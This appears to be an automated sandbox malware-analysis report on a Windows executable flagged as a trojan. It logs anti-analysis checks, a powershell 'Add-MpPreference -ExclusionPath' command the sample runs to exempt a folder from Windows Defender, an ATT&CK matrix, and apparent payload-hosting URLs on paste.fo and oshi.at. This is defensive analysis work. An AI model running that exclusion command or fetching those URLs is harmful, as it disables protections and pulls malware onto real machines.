Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeThread delayed: delay time: 100000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.7.drBinary or memory string: VMware
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.7.drBinary or memory string: vmci.sys
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: VMware20,1
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\DesktopJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\DesktopJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\DesktopJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\DesktopJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeQueries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeQueries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeQueries volume information: C:\Users\user\Desktop\9K25QyJ4hA.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
Valid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder		11
Process Injection		11
Disable or Modify Tools		OS Credential Dumping1
Query Registry		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium11
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder		31
Virtualization/Sandbox Evasion		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Ingress Tool Transfer		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
Domain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol		Data Encrypted for ImpactDNS ServerEmail Addresses
Local AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput CaptureTraffic Duplication3
Application Layer Protocol		Data DestructionVirtual Private ServerEmployee Names
Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets1
Application Window Discovery		SSHKeyloggingScheduled TransferFallback ChannelsData Encrypted for ImpactServerGather Victim Network Information
Replication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1356250 Sample: 9K25QyJ4hA.exe Startdate: 08/12/2023 Architecture: WINDOWS Score: 72 34 paste.fo 2->34 36 oshi.at 2->36 42 Antivirus detection for URL or domain 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Machine Learning detection for sample 2->48 8 9K25QyJ4hA.exe 16 3 2->8         started        12 9K25QyJ4hA.exe 3 2->12         started        14 9K25QyJ4hA.exe 2->14         started        signatures3 process4 dnsIp5 38 oshi.at 5.253.86.15, 443, 49700, 49706 HOSTSLICK-GERMANYNL Cyprus 8->38 40 paste.fo 104.21.70.240, 443, 49699, 49705 CLOUDFLARENETUS United States 8->40 50 Adds a directory exclusion to Windows Defender 8->50 16 powershell.exe 21 8->16         started        18 WerFault.exe 21 16 8->18         started        20 powershell.exe 12->20         started        22 WerFault.exe 21 12->22         started        24 powershell.exe 14->24         started        26 WerFault.exe 14->26         started        signatures6 process7 process8 28 conhost.exe 16->28         started        30 conhost.exe 20->30         started        32 conhost.exe 24->32         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
9K25QyJ4hA.exe30%ReversingLabsByteCode-MSIL.Trojan.Zilla
9K25QyJ4hA.exe100%AviraTR/Redcap.yqlbn
9K25QyJ4hA.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
http://crl.microsoft0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://oshi.at0%Avira URL Cloudsafe
https://paste.fo/raw/015dbe46ef97T0%Avira URL Cloudsafe
https://oshi.at/tqJAc/blueloqder.bin0%Avira URL Cloudsafe
http://paste.fo0%Avira URL Cloudsafe
https://oshi.at0%Avira URL Cloudsafe
https://paste.fo/raw/015dbe46ef970%Avira URL Cloudsafe
